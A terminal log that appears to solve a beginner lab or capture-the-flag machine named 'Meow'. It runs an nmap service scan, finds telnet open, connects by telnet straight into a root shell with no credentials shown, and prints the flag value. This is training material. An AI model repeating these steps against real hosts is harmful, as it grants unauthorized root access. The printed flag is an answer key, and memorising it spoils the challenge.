ubuntu@ip:~$ nmap -sV 10.129.237.214 Command 'nmap' not found, but can be installed with: sudo snap install nmap # version 7.93, or sudo apt install nmap # version 7.91+dfsg1+really7.80+dfsg1-2ubuntu0.1 See 'snap info nmap'for additional versions.
ubuntu@ip:~$ sudo snap install nmap nmap 7.93 from Maximiliano Bertacchini (maxiberta) installed
ubuntu@ip:~$ nmap -sV 10.129.237.214 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-30 17:17 UTC Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.34 seconds
ubuntu@ip:~$ nmap -sV 10.129.237.214 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-30 17:20 UTC Nmap scan report for ip-10-129-237-214.us-west-1.compute.internal (10.129.237.214) Host is up (0.078s latency). Not shown: 999 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 23/tcp open telnet Linux telnetd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.80 seconds
ubuntu@ip:~$ telnet 10.129.237.214 Trying 10.129.237.214... Connected to 10.129.237.214. Escape character is '^]'.
System information as of Fri 30 Jun 2023 05:28:39 PM UTC
System load: 0.0 Usage of /: 41.7% of 7.75GB Memory usage: 4% Swap usage: 0% Processes: 138 Users logged in: 0 IPv4 address for eth0: 10.129.237.214 IPv6 address for eth0: dead:beef::250:56ff:feb9:bd29
75 updates can be applied immediately. 31 of these updates are standard security updates. To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Mon Sep 6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0 root@Meow:~# ls flag.txt snap root@Meow:~# root@Meow:~# cat flag.txt b40abdfe23665f766f9c61ecba8a4c19 root@Meow:~#